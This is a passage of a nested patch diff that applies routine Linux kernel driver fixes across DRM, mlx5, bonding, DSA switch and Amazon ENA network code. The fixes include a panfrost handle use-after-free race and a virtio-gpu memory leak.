+-	width = ipu_src_rect_width(new_state);
+ 	height = drm_rect_height(&new_state->src) >> 16;
+ 	info = drm_format_info(fb->format->format);
+ 	ipu_calculate_bursts(width, info->cpp[0], fb->pitches[0],
+@@ -744,8 +747,7 @@ static void ipu_plane_atomic_update(struct drm_plane *plane,
+ 		ipu_cpmem_set_burstsize(ipu_plane->ipu_ch, 16);
+ 
+ 		ipu_cpmem_zero(ipu_plane->alpha_ch);
+-		ipu_cpmem_set_resolution(ipu_plane->alpha_ch,
+-					 ipu_src_rect_width(new_state),
++		ipu_cpmem_set_resolution(ipu_plane->alpha_ch, width,
+ 					 drm_rect_height(&new_state->src) >> 16);
+ 		ipu_cpmem_set_format_passthrough(ipu_plane->alpha_ch, 8);
+ 		ipu_cpmem_set_high_priority(ipu_plane->alpha_ch);
+diff --git a/drivers/gpu/drm/meson/meson_viu.c b/drivers/gpu/drm/meson/meson_viu.c
+index d4b907889a21d..cd399b0b71814 100644
+--- a/drivers/gpu/drm/meson/meson_viu.c
++++ b/drivers/gpu/drm/meson/meson_viu.c
+@@ -436,15 +436,14 @@ void meson_viu_init(struct meson_drm *priv)
+ 
+ 	/* Initialize OSD1 fifo control register */
+ 	reg = VIU_OSD_DDR_PRIORITY_URGENT |
+-		VIU_OSD_HOLD_FIFO_LINES(31) |
+ 		VIU_OSD_FIFO_DEPTH_VAL(32) | /* fifo_depth_val: 32*8=256 */
+ 		VIU_OSD_WORDS_PER_BURST(4) | /* 4 words in 1 burst */
+ 		VIU_OSD_FIFO_LIMITS(2);      /* fifo_lim: 2*16=32 */
+ 
+ 	if (meson_vpu_is_compatible(priv, VPU_COMPATIBLE_G12A))
+-		reg |= VIU_OSD_BURST_LENGTH_32;
++		reg |= (VIU_OSD_BURST_LENGTH_32 | VIU_OSD_HOLD_FIFO_LINES(31));
+ 	else
+-		reg |= VIU_OSD_BURST_LENGTH_64;
++		reg |= (VIU_OSD_BURST_LENGTH_64 | VIU_OSD_HOLD_FIFO_LINES(4));
+ 
+ 	writel_relaxed(reg, priv->io_base + _REG(VIU_OSD1_FIFO_CTRL_STAT));
+ 	writel_relaxed(reg, priv->io_base + _REG(VIU_OSD2_FIFO_CTRL_STAT));
+diff --git a/drivers/gpu/drm/panfrost/panfrost_drv.c b/drivers/gpu/drm/panfrost/panfrost_drv.c
+index 2fa5afe212889..919e6cc049828 100644
+--- a/drivers/gpu/drm/panfrost/panfrost_drv.c
++++ b/drivers/gpu/drm/panfrost/panfrost_drv.c
+@@ -82,6 +82,7 @@ static int panfrost_ioctl_create_bo(struct drm_device *dev, void *data,
+ 	struct panfrost_gem_object *bo;
+ 	struct drm_panfrost_create_bo *args = data;
+ 	struct panfrost_gem_mapping *mapping;
++	int ret;
+ 
+ 	if (!args->size || args->pad ||
+ 	    (args->flags & ~(PANFROST_BO_NOEXEC | PANFROST_BO_HEAP)))
+@@ -92,21 +93,29 @@ static int panfrost_ioctl_create_bo(struct drm_device *dev, void *data,
+ 	    !(args->flags & PANFROST_BO_NOEXEC))
+ 		return -EINVAL;
+ 
+-	bo = panfrost_gem_create_with_handle(file, dev, args->size, args->flags,
+-					     &args->handle);
++	bo = panfrost_gem_create(dev, args->size, args->flags);
+ 	if (IS_ERR(bo))
+ 		return PTR_ERR(bo);
+ 
++	ret = drm_gem_handle_create(file, &bo->base.base, &args->handle);
++	if (ret)
++		goto out;
++
+ 	mapping = panfrost_gem_mapping_get(bo, priv);
+-	if (!mapping) {
+-		drm_gem_object_put(&bo->base.base);
+-		return -EINVAL;
++	if (mapping) {
++		args->offset = mapping->mmnode.start << PAGE_SHIFT;
++		panfrost_gem_mapping_put(mapping);
++	} else {
++		/* This can only happen if the handle from
++		 * drm_gem_handle_create() has already been guessed and freed
++		 * by user space
++		 */
++		ret = -EINVAL;
+ 	}
+ 
+-	args->offset = mapping->mmnode.start << PAGE_SHIFT;
+-	panfrost_gem_mapping_put(mapping);
+-
+-	return 0;
++out:
++	drm_gem_object_put(&bo->base.base);
++	return ret;
+ }
+ 
+ /**
+diff --git a/drivers/gpu/drm/panfrost/panfrost_gem.c b/drivers/gpu/drm/panfrost/panfrost_gem.c
+index 293e799e2fe81..3c812fbd126fd 100644
+--- a/drivers/gpu/drm/panfrost/panfrost_gem.c
++++ b/drivers/gpu/drm/panfrost/panfrost_gem.c
+@@ -235,12 +235,8 @@ struct drm_gem_object *panfrost_gem_create_object(struct drm_device *dev, size_t
+ }
+ 
+ struct panfrost_gem_object *
+-panfrost_gem_create_with_handle(struct drm_file *file_priv,
+-				struct drm_device *dev, size_t size,
+-				u32 flags,
+-				uint32_t *handle)
++panfrost_gem_create(struct drm_device *dev, size_t size, u32 flags)
+ {
+-	int ret;
+ 	struct drm_gem_shmem_object *shmem;
+ 	struct panfrost_gem_object *bo;
+ 
+@@ -256,16 +252,6 @@ panfrost_gem_create_with_handle(struct drm_file *file_priv,
+ 	bo->noexec = !!(flags & PANFROST_BO_NOEXEC);
+ 	bo->is_heap = !!(flags & PANFROST_BO_HEAP);
+ 
+-	/*
+-	 * Allocate an id of idr table where the obj is registered
+-	 * and handle has the id what user can see.
+-	 */
+-	ret = drm_gem_handle_create(file_priv, &shmem->base, handle);
+-	/* drop reference from allocate - handle holds it now. */
+-	drm_gem_object_put(&shmem->base);
+-	if (ret)
+-		return ERR_PTR(ret);
+-
+ 	return bo;
+ }
+ 
+diff --git a/drivers/gpu/drm/panfrost/panfrost_gem.h b/drivers/gpu/drm/panfrost/panfrost_gem.h
+index 8088d5fd8480e..ad2877eeeccdf 100644
+--- a/drivers/gpu/drm/panfrost/panfrost_gem.h
++++ b/drivers/gpu/drm/panfrost/panfrost_gem.h
+@@ -69,10 +69,7 @@ panfrost_gem_prime_import_sg_table(struct drm_device *dev,
+ 				   struct sg_table *sgt);
+ 
+ struct panfrost_gem_object *
+-panfrost_gem_create_with_handle(struct drm_file *file_priv,
+-				struct drm_device *dev, size_t size,
+-				u32 flags,
+-				uint32_t *handle);
++panfrost_gem_create(struct drm_device *dev, size_t size, u32 flags);
+ 
+ int panfrost_gem_open(struct drm_gem_object *obj, struct drm_file *file_priv);
+ void panfrost_gem_close(struct drm_gem_object *obj,
+diff --git a/drivers/gpu/drm/virtio/virtgpu_object.c b/drivers/gpu/drm/virtio/virtgpu_object.c
+index 8d7728181de01..c7e74cf130221 100644
+--- a/drivers/gpu/drm/virtio/virtgpu_object.c
++++ b/drivers/gpu/drm/virtio/virtgpu_object.c
+@@ -184,7 +184,7 @@ int virtio_gpu_object_create(struct virtio_gpu_device *vgdev,
+ 	struct virtio_gpu_object_array *objs = NULL;
+ 	struct drm_gem_shmem_object *shmem_obj;
+ 	struct virtio_gpu_object *bo;
+-	struct virtio_gpu_mem_entry *ents;
++	struct virtio_gpu_mem_entry *ents = NULL;
+ 	unsigned int nents;
+ 	int ret;
+ 
+@@ -210,7 +210,7 @@ int virtio_gpu_object_create(struct virtio_gpu_device *vgdev,
+ 		ret = -ENOMEM;
+ 		objs = virtio_gpu_array_alloc(1);
+ 		if (!objs)
+-			goto err_put_id;
++			goto err_free_entry;
+ 		virtio_gpu_array_add_obj(objs, &bo->base.base);
+ 
+ 		ret = virtio_gpu_array_lock_resv(objs);
+@@ -239,6 +239,8 @@ int virtio_gpu_object_create(struct virtio_gpu_device *vgdev,
+ 
+ err_put_objs:
+ 	virtio_gpu_array_put_free(objs);
++err_free_entry:
++	kvfree(ents);
+ err_put_id:
+ 	virtio_gpu_resource_id_put(vgdev, bo->hw_res_handle);
+ err_free_gem:
+diff --git a/drivers/infiniband/hw/mlx5/counters.c b/drivers/infiniband/hw/mlx5/counters.c
+index 945758f395236..3e1272695d993 100644
+--- a/drivers/infiniband/hw/mlx5/counters.c
++++ b/drivers/infiniband/hw/mlx5/counters.c
+@@ -278,7 +278,6 @@ static int do_get_hw_stats(struct ib_device *ibdev,
+ 	const struct mlx5_ib_counters *cnts = get_counters(dev, port_num - 1);
+ 	struct mlx5_core_dev *mdev;
+ 	int ret, num_counters;
+-	u32 mdev_port_num;
+ 
+ 	if (!stats)
+ 		return -EINVAL;
+@@ -299,8 +298,9 @@ static int do_get_hw_stats(struct ib_device *ibdev,
+ 	}
+ 
+ 	if (MLX5_CAP_GEN(dev->mdev, cc_query_allowed)) {
+-		mdev = mlx5_ib_get_native_port_mdev(dev, port_num,
+-						    &mdev_port_num);
++		if (!port_num)
++			port_num = 1;
++		mdev = mlx5_ib_get_native_port_mdev(dev, port_num, NULL);
+ 		if (!mdev) {
+ 			/* If port is not affiliated yet, its in down state
+ 			 * which doesn't have any counters yet, so it would be
+diff --git a/drivers/infiniband/hw/mlx5/qp.c b/drivers/infiniband/hw/mlx5/qp.c
+index 40d9410ec3033..cf953d23d18da 100644
+--- a/drivers/infiniband/hw/mlx5/qp.c
++++ b/drivers/infiniband/hw/mlx5/qp.c
+@@ -4502,6 +4502,40 @@ static bool mlx5_ib_modify_qp_allowed(struct mlx5_ib_dev *dev,
+ 	return false;
+ }
+ 
++static int validate_rd_atomic(struct mlx5_ib_dev *dev, struct ib_qp_attr *attr,
++			      int attr_mask, enum ib_qp_type qp_type)
++{
++	int log_max_ra_res;
++	int log_max_ra_req;
++
++	if (qp_type == MLX5_IB_QPT_DCI) {
++		log_max_ra_res = 1 << MLX5_CAP_GEN(dev->mdev,
++						   log_max_ra_res_dc);
++		log_max_ra_req = 1 << MLX5_CAP_GEN(dev->mdev,
++						   log_max_ra_req_dc);
++	} else {
++		log_max_ra_res = 1 << MLX5_CAP_GEN(dev->mdev,
++						   log_max_ra_res_qp);
++		log_max_ra_req = 1 << MLX5_CAP_GEN(dev->mdev,
++						   log_max_ra_req_qp);
++	}
++
++	if (attr_mask & IB_QP_MAX_QP_RD_ATOMIC &&
++	    attr->max_rd_atomic > log_max_ra_res) {
++		mlx5_ib_dbg(dev, "invalid max_rd_atomic value %d\n",
++			    attr->max_rd_atomic);
++		return false;
++	}
++
++	if (attr_mask & IB_QP_MAX_DEST_RD_ATOMIC &&
++	    attr->max_dest_rd_atomic > log_max_ra_req) {
++		mlx5_ib_dbg(dev, "invalid max_dest_rd_atomic value %d\n",
++			    attr->max_dest_rd_atomic);
++		return false;
++	}
++	return true;
++}
++
+ int mlx5_ib_modify_qp(struct ib_qp *ibqp, struct ib_qp_attr *attr,
+ 		      int attr_mask, struct ib_udata *udata)
+ {
+@@ -4589,21 +4623,8 @@ int mlx5_ib_modify_qp(struct ib_qp *ibqp, struct ib_qp_attr *attr,
+ 		goto out;
+ 	}
+ 
+-	if (attr_mask & IB_QP_MAX_QP_RD_ATOMIC &&
+-	    attr->max_rd_atomic >
+-	    (1 << MLX5_CAP_GEN(dev->mdev, log_max_ra_res_qp))) {
+-		mlx5_ib_dbg(dev, "invalid max_rd_atomic value %d\n",
+-			    attr->max_rd_atomic);
+-		goto out;
+-	}
+-
+-	if (attr_mask & IB_QP_MAX_DEST_RD_ATOMIC &&
+-	    attr->max_dest_rd_atomic >
+-	    (1 << MLX5_CAP_GEN(dev->mdev, log_max_ra_req_qp))) {
+-		mlx5_ib_dbg(dev, "invalid max_dest_rd_atomic value %d\n",
+-			    attr->max_dest_rd_atomic);
++	if (!validate_rd_atomic(dev, attr, attr_mask, qp_type))
+ 		goto out;
+-	}
+ 
+ 	if (cur_state == new_state && cur_state == IB_QPS_RESET) {
+ 		err = 0;
+diff --git a/drivers/net/bonding/bond_3ad.c b/drivers/net/bonding/bond_3ad.c
+index e58a1e0cadd2e..9270977e6c7ff 100644
+--- a/drivers/net/bonding/bond_3ad.c
++++ b/drivers/net/bonding/bond_3ad.c
+@@ -1540,6 +1540,7 @@ static void ad_port_selection_logic(struct port *port, bool *update_slave_arr)
+ 			slave_err(bond->dev, port->slave->dev,
+ 				  "Port %d did not find a suitable aggregator\n",
+ 				  port->actor_port_number);
++			return;
+ 		}
+ 	}
+ 	/* if all aggregator's ports are READY_N == TRUE, set ready=TRUE
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index b108f2f4adc20..fce9301c8ebbc 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -2653,10 +2653,12 @@ static void bond_miimon_link_change(struct bonding *bond,
+ 
+ static void bond_miimon_commit(struct bonding *bond)
+ {
+-	struct slave *slave, *primary;
++	struct slave *slave, *primary, *active;
+ 	bool do_failover = false;
+ 	struct list_head *iter;
+ 
++	ASSERT_RTNL();
++
+ 	bond_for_each_slave(bond, slave, iter) {
+ 		switch (slave->link_new_state) {
+ 		case BOND_LINK_NOCHANGE:
+@@ -2699,8 +2701,8 @@ static void bond_miimon_commit(struct bonding *bond)
+ 
+ 			bond_miimon_link_change(bond, slave, BOND_LINK_UP);
+ 
+-			if (!rcu_access_pointer(bond->curr_active_slave) || slave == primary ||
+-			    slave->prio > rcu_dereference(bond->curr_active_slave)->prio)
++			active = rtnl_dereference(bond->curr_active_slave);
++			if (!active || slave == primary || slave->prio > active->prio)
+ 				do_failover = true;
+ 
+ 			continue;
+diff --git a/drivers/net/dsa/mv88e6xxx/Kconfig b/drivers/net/dsa/mv88e6xxx/Kconfig
+index 7a2445a34eb77..e3181d5471dfe 100644
+--- a/drivers/net/dsa/mv88e6xxx/Kconfig
++++ b/drivers/net/dsa/mv88e6xxx/Kconfig
+@@ -2,7 +2,6 @@
+ config NET_DSA_MV88E6XXX
+ 	tristate "Marvell 88E6xxx Ethernet switch fabric support"
+ 	depends on NET_DSA
+-	depends on PTP_1588_CLOCK_OPTIONAL
+ 	select IRQ_DOMAIN
+ 	select NET_DSA_TAG_EDSA
+ 	select NET_DSA_TAG_DSA
+@@ -13,7 +12,8 @@ config NET_DSA_MV88E6XXX
+ config NET_DSA_MV88E6XXX_PTP
+ 	bool "PTP support for Marvell 88E6xxx"
+ 	default n
+-	depends on NET_DSA_MV88E6XXX && PTP_1588_CLOCK
++	depends on (NET_DSA_MV88E6XXX = y && PTP_1588_CLOCK = y) || \
++	           (NET_DSA_MV88E6XXX = m && PTP_1588_CLOCK)
+ 	help
+ 	  Say Y to enable PTP hardware timestamping on Marvell 88E6xxx switch
+ 	  chips that support it.
+diff --git a/drivers/net/dsa/qca/qca8k-8xxx.c b/drivers/net/dsa/qca/qca8k-8xxx.c
+index c5c3b4e92f28b..fbcd5c2b13aeb 100644
+--- a/drivers/net/dsa/qca/qca8k-8xxx.c
++++ b/drivers/net/dsa/qca/qca8k-8xxx.c
+@@ -36,44 +36,6 @@ qca8k_split_addr(u32 regaddr, u16 *r1, u16 *r2, u16 *page)
+ 	*page = regaddr & 0x3ff;
+ }
+ 
+-static int
+-qca8k_set_lo(struct qca8k_priv *priv, int phy_id, u32 regnum, u16 lo)
+-{
+-	u16 *cached_lo = &priv->mdio_cache.lo;
+-	struct mii_bus *bus = priv->bus;
+-	int ret;
+-
+-	if (lo == *cached_lo)
+-		return 0;
+-
+-	ret = bus->write(bus, phy_id, regnum, lo);
+-	if (ret < 0)
+-		dev_err_ratelimited(&bus->dev,
+-				    "failed to write qca8k 32bit lo register\n");
+-
+-	*cached_lo = lo;
+-	return 0;
+-}
+-
+-static int
+-qca8k_set_hi(struct qca8k_priv *priv, int phy_id, u32 regnum, u16 hi)
+-{
+-	u16 *cached_hi = &priv->mdio_cache.hi;
+-	struct mii_bus *bus = priv->bus;
+-	int ret;
+-
+-	if (hi == *cached_hi)
+-		return 0;
+-
+-	ret = bus->write(bus, phy_id, regnum, hi);
+-	if (ret < 0)
+-		dev_err_ratelimited(&bus->dev,
+-				    "failed to write qca8k 32bit hi register\n");
+-
+-	*cached_hi = hi;
+-	return 0;
+-}
+-
+ static int
+ qca8k_mii_read32(struct mii_bus *bus, int phy_id, u32 regnum, u32 *val)
+ {
+@@ -97,7 +59,7 @@ qca8k_mii_read32(struct mii_bus *bus, int phy_id, u32 regnum, u32 *val)
+ }
+ 
+ static void
+-qca8k_mii_write32(struct qca8k_priv *priv, int phy_id, u32 regnum, u32 val)
++qca8k_mii_write32(struct mii_bus *bus, int phy_id, u32 regnum, u32 val)
+ {
+ 	u16 lo, hi;
+ 	int ret;
+@@ -105,9 +67,12 @@ qca8k_mii_write32(struct qca8k_priv *priv, int phy_id, u32 regnum, u32 val)
+ 	lo = val & 0xffff;
+ 	hi = (u16)(val >> 16);
+ 
+-	ret = qca8k_set_lo(priv, phy_id, regnum, lo);
++	ret = bus->write(bus, phy_id, regnum, lo);
+ 	if (ret >= 0)
+-		ret = qca8k_set_hi(priv, phy_id, regnum + 1, hi);
++		ret = bus->write(bus, phy_id, regnum + 1, hi);
++	if (ret < 0)
++		dev_err_ratelimited(&bus->dev,
++				    "failed to write qca8k 32bit register\n");
+ }
+ 
+ static int
+@@ -146,7 +111,16 @@ static void qca8k_rw_reg_ack_handler(struct dsa_switch *ds, struct sk_buff *skb)
+ 
+ 	command = get_unaligned_le32(&mgmt_ethhdr->command);
+ 	cmd = FIELD_GET(QCA_HDR_MGMT_CMD, command);
++
+ 	len = FIELD_GET(QCA_HDR_MGMT_LENGTH, command);
++	/* Special case for len of 15 as this is the max value for len and needs to
++	 * be increased before converting it from word to dword.
++	 */
++	if (len == 15)
++		len++;
++
++	/* We can ignore odd value, we always round up them in the alloc function. */
++	len *= sizeof(u16);
+ 
+ 	/* Make sure the seq match the requested packet */
+ 	if (get_unaligned_le32(&mgmt_ethhdr->seq) == mgmt_eth_data->seq)
+@@ -193,17 +167,33 @@ static struct sk_buff *qca8k_alloc_mdio_header(enum mdio_cmd cmd, u32 reg, u32 *
+ 	if (!skb)
+ 		return NULL;
+ 
+-	/* Max value for len reg is 15 (0xf) but the switch actually return 16 byte
+-	 * Actually for some reason the steps are:
+-	 * 0: nothing
+-	 * 1-4: first 4 byte
+-	 * 5-6: first 12 byte
+-	 * 7-15: all 16 byte
++	/* Hdr mgmt length value is in step of word size.
++	 * As an example to process 4 byte of data the correct length to set is 2.
++	 * To process 8 byte 4, 12 byte 6, 16 byte 8...
++	 *
++	 * Odd values will always return the next size on the ack packet.
++	 * (length of 3 (6 byte) will always return 8 bytes of data)
++	 *
++	 * This means that a value of 15 (0xf) actually means reading/writing 32 bytes
++	 * of data.
++	 *
++	 * To correctly calculate the length we devide the requested len by word and
++	 * round up.
++	 * On the ack function we can skip the odd check as we already handle the
++	 * case here.
++	 */
++	real_len = DIV_ROUND_UP(len, sizeof(u16));
++
++	/* We check if the result len is odd and we round up another time to
++	 * the next size. (length of 3 will be increased to 4 as switch will always
++	 * return 8 bytes)
+ 	 */
+-	if (len == 16)
+-		real_len = 15;
+-	else
+-		real_len = len;
++	if (real_len % sizeof(u16) != 0)
++		real_len++;
++
++	/* Max reg value is 0xf(15) but switch will always return the next size (32 byte) */
++	if (real_len == 16)
++		real_len--;
+ 
+ 	skb_reset_mac_header(skb);
+ 	skb_set_network_header(skb, skb->len);
+@@ -417,7 +407,7 @@ qca8k_regmap_write(void *ctx, uint32_t reg, uint32_t val)
+ 	if (ret < 0)
+ 		goto exit;
+ 
+-	qca8k_mii_write32(priv, 0x10 | r2, r1, val);
++	qca8k_mii_write32(bus, 0x10 | r2, r1, val);
+ 
+ exit:
+ 	mutex_unlock(&bus->mdio_lock);
+@@ -450,7 +440,7 @@ qca8k_regmap_update_bits(void *ctx, uint32_t reg, uint32_t mask, uint32_t write_
+ 
+ 	val &= ~mask;
+ 	val |= write_val;
+-	qca8k_mii_write32(priv, 0x10 | r2, r1, val);
++	qca8k_mii_write32(bus, 0x10 | r2, r1, val);
+ 
+ exit:
+ 	mutex_unlock(&bus->mdio_lock);
+@@ -725,14 +715,14 @@ qca8k_mdio_write(struct qca8k_priv *priv, int phy, int regnum, u16 data)
+ 	if (ret)
+ 		goto exit;
+ 
+-	qca8k_mii_write32(priv, 0x10 | r2, r1, val);
++	qca8k_mii_write32(bus, 0x10 | r2, r1, val);
+ 
+ 	ret = qca8k_mdio_busy_wait(bus, QCA8K_MDIO_MASTER_CTRL,
+ 				   QCA8K_MDIO_MASTER_BUSY);
+ 
+ exit:
+ 	/* even if the busy_wait timeouts try to clear the MASTER_EN */
+-	qca8k_mii_write32(priv, 0x10 | r2, r1, 0);
++	qca8k_mii_write32(bus, 0x10 | r2, r1, 0);
+ 
+ 	mutex_unlock(&bus->mdio_lock);
+ 
+@@ -762,7 +752,7 @@ qca8k_mdio_read(struct qca8k_priv *priv, int phy, int regnum)
+ 	if (ret)
+ 		goto exit;
+ 
+-	qca8k_mii_write32(priv, 0x10 | r2, r1, val);
++	qca8k_mii_write32(bus, 0x10 | r2, r1, val);
+ 
+ 	ret = qca8k_mdio_busy_wait(bus, QCA8K_MDIO_MASTER_CTRL,
+ 				   QCA8K_MDIO_MASTER_BUSY);
+@@ -773,7 +763,7 @@ qca8k_mdio_read(struct qca8k_priv *priv, int phy, int regnum)
+ 
+ exit:
+ 	/* even if the busy_wait timeouts try to clear the MASTER_EN */
+-	qca8k_mii_write32(priv, 0x10 | r2, r1, 0);
++	qca8k_mii_write32(bus, 0x10 | r2, r1, 0);
+ 
+ 	mutex_unlock(&bus->mdio_lock);
+ 
+@@ -1943,8 +1933,6 @@ qca8k_sw_probe(struct mdio_device *mdiodev)
+ 	}
+ 
+ 	priv->mdio_cache.page = 0xffff;
+-	priv->mdio_cache.lo = 0xffff;
+-	priv->mdio_cache.hi = 0xffff;
+ 
+ 	/* Check the detected switch id */
+ 	ret = qca8k_read_switch_id(priv);
+diff --git a/drivers/net/dsa/qca/qca8k.h b/drivers/net/dsa/qca/qca8k.h
+index 0b7a5cb123216..03514f7a20bec 100644
+--- a/drivers/net/dsa/qca/qca8k.h
++++ b/drivers/net/dsa/qca/qca8k.h
+@@ -375,11 +375,6 @@ struct qca8k_mdio_cache {
+  * mdio writes
+  */
+ 	u16 page;
+-/* lo and hi can also be cached and from Documentation we can skip one
+- * extra mdio write if lo or hi is didn't change.
+- */
+-	u16 lo;
+-	u16 hi;
+ };
+ 
+ struct qca8k_pcs {
+diff --git a/drivers/net/ethernet/amazon/ena/ena_com.c b/drivers/net/ethernet/amazon/ena/ena_com.c
+index 8c8b4c88c7dea..451c3a1b62553 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_com.c
++++ b/drivers/net/ethernet/amazon/ena/ena_com.c
+@@ -2400,29 +2400,18 @@ int ena_com_fill_hash_function(struct ena_com_dev *ena_dev,
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+-	switch (func) {
+-	case ENA_ADMIN_TOEPLITZ:
+-		if (key) {
+-			if (key_len != sizeof(hash_key->key)) {
+-				netdev_err(ena_dev->net_device,
+-					   "key len (%u) doesn't equal the supported size (%zu)\n",
+-					   key_len, sizeof(hash_key->key));
+-				return -EINVAL;
+-			}
+-			memcpy(hash_key->key, key, key_len);
+-			rss->hash_init_val = init_val;
+-			hash_key->key_parts = key_len / sizeof(hash_key->key[0]);
++	if ((func == ENA_ADMIN_TOEPLITZ) && key) {
++		if (key_len != sizeof(hash_key->key)) {
++			netdev_err(ena_dev->net_device,
++				   "key len (%u) doesn't equal the supported size (%zu)\n",
++				   key_len, sizeof(hash_key->key));
++			return -EINVAL;
+ 		}
+-		break;
+-	case ENA_ADMIN_CRC32:
+-		rss->hash_init_val = init_val;
+-		break;
+-	default:
+-		netdev_err(ena_dev->net_device, "Invalid hash function (%d)\n",
+-			   func);
+-		return -EINVAL;
++		memcpy(hash_key->key, key, key_len);
++		hash_key->key_parts = key_len / sizeof(hash_key->key[0]);
+ 	}
+ 
++	rss->hash_init_val = init_val;
+ 	old_func = rss->hash_func;
+ 	rss->hash_func = func;
+ 	rc = ena_com_set_hash_function(ena_dev);
+diff --git a/drivers/net/ethernet/amazon/ena/ena_ethtool.c b/drivers/net/ethernet/amazon/ena/ena_ethtool.c
+index 98d6386b7f398..444ccef76da29 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_ethtool.c
++++ b/drivers/net/ethernet/amazon/ena/ena_ethtool.c
+@@ -887,11 +887,7 @@ static int ena_set_tunable(struct net_device *netdev,
+ 	switch (tuna->id) {
+ 	case ETHTOOL_RX_COPYBREAK:
+ 		len = *(u32 *)data;
+-		if (len > adapter->netdev->mtu) {
+-			ret = -EINVAL;
+-			break;
+-		}
+-		adapter->rx_copybreak = len;
++		ret = ena_set_rx_copybreak(adapter, len);
+ 		break;
+ 	default:
+ 		ret = -EINVAL;
+diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.c b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+index 5a454b58498fd..5ce01ac72637e 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_netdev.c
++++ b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+@@ -374,9 +374,9 @@ static int ena_xdp_xmit(struct net_device *dev, int n,
+ 
+ static int ena_xdp_execute(struct ena_ring *rx_ring, struct xdp_buff *xdp)
+ {
++	u32 verdict = ENA_XDP_PASS;
+ 	struct bpf_prog *xdp_prog;
+ 	struct ena_ring *xdp_ring;
+-	u32 verdict = XDP_PASS;
+ 	struct xdp_frame *xdpf;
+ 	u64 *xdp_stat;
+ 
+@@ -393,7 +393,7 @@ static int ena_xdp_execute(struct ena_ring *rx_ring, struct xdp_buff *xdp)
+ 		if (unlikely(!xdpf)) {
+ 			trace_xdp_exception(rx_ring->netdev, xdp_prog, verdict);
+ 			xdp_stat = &rx_ring->rx_stats.xdp_aborted;
+-			verdict = XDP_ABORTED;
++			verdict = ENA_XDP_DROP;
+ 			break;
+ 		}
+ 
+@@ -409,29 +409,35 @@ static int ena_xdp_execute(struct ena_ring *rx_ring, struct xdp_buff *xdp)
+ 
+ 		spin_unlock(&xdp_ring->xdp_tx_lock);
+ 		xdp_stat = &rx_ring->rx_stats.xdp_tx;
++		verdict = ENA_XDP_TX;
+ 		break;
+ 	case XDP_REDIRECT:
+ 		if (likely(!xdp_do_redirect(rx_ring->netdev, xdp, xdp_prog))) {
+ 			xdp_stat = &rx_ring->rx_stats.xdp_redirect;
++			verdict = ENA_XDP_REDIRECT;
+ 			break;
+ 		}
+ 		trace_xdp_exception(rx_ring->netdev, xdp_prog, verdict);
+ 		xdp_stat = &rx_ring->rx_stats.xdp_aborted;
+-		verdict = XDP_ABORTED;
++		verdict = ENA_XDP_DROP;
+ 		break;
+ 	case XDP_ABORTED:
+ 		trace_xdp_exception(rx_ring->netdev, xdp_prog, verdict);
+ 		xdp_stat = &rx_ring->rx_stats.xdp_aborted;
++		verdict = ENA_XDP_DROP;
+ 		break;
+ 	case XDP_DROP:
+ 		xdp_stat = &rx_ring->rx_stats.xdp_drop;
++		verdict = ENA_XDP_DROP;
+ 		break;
+ 	case XDP_PASS:
+ 		xdp_stat = &rx_ring->rx_stats.xdp_pass;
++		verdict = ENA_XDP_PASS;
+ 		break;
+ 	default:
+ 		bpf_warn_invalid_xdp_action(rx_ring->netdev, xdp_prog, verdict);
+ 		xdp_stat = &rx_ring->rx_stats.xdp_invalid;
++		verdict = ENA_XDP_DROP;
+ 	}
+ 
+ 	ena_increase_stat(xdp_stat, 1, &rx_ring->syncp);
+@@ -512,16 +518,18 @@ static void ena_xdp_exchange_program_rx_in_range(struct ena_adapter *adapter,
+ 						 struct bpf_prog *prog,
+ 						 int first, int count)
+ {
++	struct bpf_prog *old_bpf_prog;
+ 	struct ena_ring *rx_ring;
+ 	int i = 0;
+ 
+ 	for (i = first; i < count; i++) {
+ 		rx_ring = &adapter->rx_ring[i];
+-		xchg(&rx_ring->xdp_bpf_prog, prog);
+-		if (prog) {
++		old_bpf_prog = xchg(&rx_ring->xdp_bpf_prog, prog);
++
++		if (!old_bpf_prog && prog) {
+ 			ena_xdp_register_rxq_info(rx_ring);
+ 			rx_ring->rx_headroom = XDP_PACKET_HEADROOM;
+-		} else {
++		} else if (old_bpf_prog && !prog) {
+ 			ena_xdp_unregister_rxq_info(rx_ring);
+ 			rx_ring->rx_headroom = NET_SKB_PAD;
+ 		}
+@@ -672,6 +680,7 @@ static void ena_init_io_rings_common(struct ena_adapter *adapter,
+ 	ring->ena_dev = adapter->ena_dev;
+ 	ring->per_napi_packets = 0;
+ 	ring->cpu = 0;
++	ring->numa_node = 0;
+ 	ring->no_interrupt_event_cnt = 0;
+ 	u64_stats_init(&ring->syncp);
+ }
+@@ -775,6 +784,7 @@ static int ena_setup_tx_resources(struct ena_adapter *adapter, int qid)
+ 	tx_ring->next_to_use = 0;
+ 	tx_ring->next_to_clean = 0;
+ 	tx_ring->cpu = ena_irq->cpu;
++	tx_ring->numa_node = node;
+ 	return 0;
+ 
+ err_push_buf_intermediate_buf:
+@@ -907,6 +917,7 @@ static int ena_setup_rx_resources(struct ena_adapter *adapter,
+ 	rx_ring->next_to_clean = 0;
+ 	rx_ring->next_to_use = 0;
+ 	rx_ring->cpu = ena_irq->cpu;
++	rx_ring->numa_node = node;
+ 
+ 	return 0;
+ }
+@@ -1619,12 +1630,12 @@ static int ena_xdp_handle_buff(struct ena_ring *rx_ring, struct xdp_buff *xdp)
+ 	 * we expect, then we simply drop it
+ 	 */
+ 	if (unlikely(rx_ring->ena_bufs[0].len > ENA_XDP_MAX_MTU))
+-		return XDP_DROP;
++		return ENA_XDP_DROP;
+ 
+ 	ret = ena_xdp_execute(rx_ring, xdp);
+ 
+ 	/* The xdp program might expand the headers */
+-	if (ret == XDP_PASS) {
++	if (ret == ENA_XDP_PASS) {
+ 		rx_info->page_offset = xdp->data - xdp->data_hard_start;
+ 		rx_ring->ena_bufs[0].len = xdp->data_end - xdp->data;
+ 	}
+@@ -1663,7 +1674,7 @@ static int ena_clean_rx_irq(struct ena_ring *rx_ring, struct napi_struct *napi,
+ 	xdp_init_buff(&xdp, ENA_PAGE_SIZE, &rx_ring->xdp_rxq);
+ 
+ 	do {
